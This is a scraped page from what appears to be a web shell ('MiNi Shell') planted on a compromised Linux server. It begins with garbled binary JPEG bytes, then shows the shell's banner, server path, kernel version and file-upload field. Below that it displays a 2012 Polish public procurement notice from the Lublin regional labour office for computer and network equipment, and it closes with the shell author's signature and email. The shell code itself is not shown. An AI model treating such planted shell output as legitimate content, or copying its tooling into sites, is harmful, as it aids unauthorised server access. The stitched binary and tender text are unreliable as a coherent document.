JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121107/235295-N-2012.html

<p class="kh_header"><b>Lublin: Dostawa sprzętu i akcesoriów serwerowo-sieciowych, akcesoriów i części komputerowych, drukarek oraz zestawu interaktywnego dla Wojewódzkiego Urzędu Pracy w Lublinie</b><br>
<b>Numer ogłoszenia: 235295 - 2012; data zamieszczenia: 07.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Lublinie , ul. Okopowa 5, 20-022 Lublin, woj. lubelskie, tel. 081 4635300, faks 081 4635305.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu i akcesoriów serwerowo-sieciowych, akcesoriów i części komputerowych, drukarek oraz zestawu interaktywnego dla Wojewódzkiego Urzędu Pracy w Lublinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu i akcesoriów serwerowo-sieciowych, akcesoriów i części komputerowych, drukarek oraz zestawu interaktywnego dla Wojewódzkiego Urzędu Pracy w Lublinie. 
Część I
Dostawa sprzętu i akcesoriów serwerowo-sieciowych
1)	Przełącznik KVM 16-portowy z modułem pracy sieciowej oraz zestawem kabli przyłączeniowych (1 szt.)
2)	Konsola KVM 19 dual-rail (1 szt.)
3)	Karta do zarządzania sieciowego do UPSa APC Smart-UPS SUA2200RMI2U (1 szt.)
4)	Detektor monitorowania środowiska EMP (Environmental Monitoring Probe) dedykowany do UPSa Eaton Eaton 5PX2200iRTN (szt. 1)
5)	Dodatkowy moduł bateryjny (EBM) 2U do UPSa Eaton 5PX2200iRTN (2 szt.)
6)	Zasilacz awaryjny UPS (3 szt.)
7)	Licencja IPS do routera CISCO 2901 (1 szt.)
8)	Zaciskarka uniwersalna do wtyków RJ45, RJ12, RJ11 (1 szt.)
9)	Ściągacz izolacji (1 szt.)
10)	Przyrząd do wciskania kabli do terminali typu LSA kompatybilny z KRONE	 (1 szt.)
11)	Przenośna drukarka etykiet (1 szt.)
12)	Patchcordy światłowodowe LC/ST 62,5/125 duplex (6 szt.)
13)	Kabel UTP cat 5e (2 szt.)
14)	Wtyk modularny RJ-45 (500 szt.)
15)	Tester sieci LAN (1 szt.)
16)	Pamięć RAM do serwera IBM x3550 M3 model 7944 K3G
17)	Karta sieciowa do serwera (3 szt.)
18)	Kabel zasilający IEC320 C13/C14  (10 szt.)
19)	Dysk twardy do macierzy dyskowej (2 szt.)
20)	Listwa zasilająca rack 19 (2 szt.)

Część II
Dostawa oprogramowania i akcesoriów komputerowych
1)	Pakiet oprogramowania graficznego (3 szt.)
2)	Zasilacz awaryjny UPS (6 szt.)
3)	Listwa antyprzepięciowa - (20 szt.)
4)	Zasilacz ATX typ 1 (15 szt.)
5)	Zasilacz ATX typ 2 (3 szt.)
6)	Zasilacz do laptopa Compal FL90 (1 szt.)
7)	Pamięć RAM typ 1 (10 szt.)
8)	Pamięć RAM typ 2 (4 szt.)
9)	Pamięć RAM typ 3 (7 szt.)
10)	Pamięć RAM typ 4 (7 szt.)
11)	Dysk twardy zewnętrzny 2,5 USB 3.0 (1 szt.)
12)	Dysk twardy 2,5 SATA (2 szt.)
13)	Dysk twardy 3,5 SATA (6 szt.)
14)	Bateria CR2032 (10 szt.)
15)	Przedłużka PS/2 (20 szt.)
16)	Kontroler USB 3.0 PCIe (2 szt.)
17)	Kontroler USB 2.0 PCI (1 szt.)
18)	Hub aktywny USB (2 szt.)
19)	Pasta termoprzewodząca (5 szt.)
20)	Cooler CPU (LGA775/AM3) - (5 szt.)
21)	Wentylator 120mm (5 szt.)
22)	Wentylator 92mm (5 szt.)
23)	Wentylator 80mm (5 szt.)
24)	Wentylator 40mm (6 szt.)
25)	Mysz USB (3 szt.)
26)	Klawiatura USB (3 szt.)
27)	Pamięć RAM do drukarek HP LaserJet P2015/P2055 (10 szt.)
28)	Kabel do projektora VGA-VGA (D-sub) (1 szt.)
29)	Kamera internetowa 720p (1 szt.)
30)	Słuchawki z mikrofonem do komputera (1 szt.)
31)	Nagrywarka DVD (1 szt.)

Część III
Dostawa zestawu interaktywnego
1)	Zestaw interaktywny (1 szt.)
1.	Tablica interaktywna
2.	Projektor ultrakrótkoogniskowy
3.	Głośniki multimedialne ze wzmacniaczem
4.	Moduł przyłączeniowo-sterujący do projektora i głośników
5.	Montaż i uruchomienie zestawu

Część IV
Dostawa drukarek i zasilaczy UPS
1)	Zasilacz awaryjny UPS (6 szt.)
2)	Drukarka laserowa A4 mono (2 szt.)
3)	Drukarka laserowa A4 kolorowa (1 szt.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.72.00-1, 30.23.72.80-5, 32.42.10.00-0, 32.42.00.00-3, 30.23.60.00-2, 30.23.71.30-9, 30.23.41.00-9, 48.32.80.00-3, 30.23.61.11-3, 32.32.20.00-6, 38.65.21.00-1, 32.34.24.12-3, 30.23.21.10-8, 30.23.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy.
2.	Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy.
3.	Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy.
4.	Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wup.lublin.pl/wup/index.php?kat=200<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Lublinie,
ul. Okopowa 5 pok. nr 310 (III p.)
20- 022 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 09:00, miejsce: Wojewódzki Urząd Pracy w Lublinie,
ul. Okopowa 5 pok. nr 326A (III p.)
20- 022 Lublin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu i akcesoriów serwerowo-sieciowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Przełącznik KVM 16-portowy z modułem pracy sieciowej oraz zestawem kabli przyłączeniowych (1 szt.)
2)	Konsola KVM 19 dual-rail (1 szt.)
3)	Karta do zarządzania sieciowego do UPSa APC Smart-UPS SUA2200RMI2U (1 szt.)
4)	Detektor monitorowania środowiska EMP (Environmental Monitoring Probe) dedykowany do UPSa Eaton Eaton 5PX2200iRTN (szt. 1)
5)	Dodatkowy moduł bateryjny (EBM) 2U do UPSa Eaton 5PX2200iRTN (2 szt.)
6)	Zasilacz awaryjny UPS (3 szt.)
7)	Licencja IPS do routera CISCO 2901 (1 szt.)
8)	Zaciskarka uniwersalna do wtyków RJ45, RJ12, RJ11 (1 szt.)
9)	Ściągacz izolacji (1 szt.)
10)	Przyrząd do wciskania kabli do terminali typu LSA kompatybilny z KRONE	 (1 szt.)
11)	Przenośna drukarka etykiet (1 szt.)
12)	Patchcordy światłowodowe LC/ST 62,5/125 duplex (6 szt.)
13)	Kabel UTP cat 5e (2 szt.)
14)	Wtyk modularny RJ-45 (500 szt.)
15)	Tester sieci LAN (1 szt.)
16)	Pamięć RAM do serwera IBM x3550 M3 model 7944 K3G
17)	Karta sieciowa do serwera (3 szt.)
18)	Kabel zasilający IEC320 C13 C14  (10 szt.)
19)	Dysk twardy do macierzy dyskowej (2 szt.)
20)	Listwa zasilająca rack 19 (2 szt.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.72.00-1, 30.23.72.80-5, 32.42.10.00-0, 32.42.00.00-3, 30.23.60.00-2, 30.23.71.30-9, 30.23.41.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa oprogramowania i akcesoriów komputerowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Pakiet oprogramowania graficznego (3 szt.)
2)	Zasilacz awaryjny UPS (6 szt.)
3)	Listwa antyprzepięciowa - (20 szt.)
4)	Zasilacz ATX typ 1 (15 szt.)
5)	Zasilacz ATX typ 2 (3 szt.)
6)	Zasilacz do laptopa Compal FL90 (1 szt.)
7)	Pamięć RAM typ 1 (10 szt.)
8)	Pamięć RAM typ 2 (4 szt.)
9)	Pamięć RAM typ 3 (7 szt.)
10)	Pamięć RAM typ 4 (7 szt.)
11)	Dysk twardy zewnętrzny 2,5 USB 3.0 (1 szt.)
12)	Dysk twardy 2,5 SATA (2 szt.)
13)	Dysk twardy 3,5 SATA (6 szt.)
14)	Bateria CR2032 (10 szt.)
15)	Przedłużka PS/2 (20 szt.)
16)	Kontroler USB 3.0 PCIe (2 szt.)
17)	Kontroler USB 2.0 PCI (1 szt.)
18)	Hub aktywny USB (2 szt.)
19)	Pasta termoprzewodząca (5 szt.)
20)	Cooler CPU (LGA775/AM3) - (5 szt.)
21)	Wentylator 120mm (5 szt.)
22)	Wentylator 92mm (5 szt.)
23)	Wentylator 80mm (5 szt.)
24)	Wentylator 40mm (6 szt.)
25)	Mysz USB (3 szt.)
26)	Klawiatura USB (3 szt.)
27)	Pamięć RAM do drukarek HP LaserJet P2015/P2055 (10 szt.)
28)	Kabel do projektora VGA-VGA (D-sub) (1 szt.)
29)	Kamera internetowa 720p (1 szt.)
30)	Słuchawki z mikrofonem do komputera (1 szt.)
31)	Nagrywarka DVD (1 szt.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.32.80.00-3, 30.23.72.00-1, 30.23.72.80-5, 30.23.60.00-2, 30.23.71.30-9, 30.23.61.11-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa zestawu interaktywnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw interaktywny (1 szt.)
1.	Tablica interaktywna
2.	Projektor ultrakrótkoogniskowy
3.	Głośniki multimedialne ze wzmacniaczem
4.	Moduł przyłączeniowo-sterujący do projektora i głośników
5.	Montaż i uruchomienie zestawu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6, 38.65.21.00-1, 32.34.24.12-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa drukarek i zasilaczy UPS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Zasilacz awaryjny UPS (6 szt.)
2)	Drukarka laserowa A4 mono (2 szt.)
3)	Drukarka laserowa A4 kolorowa (1 szt.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.23.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com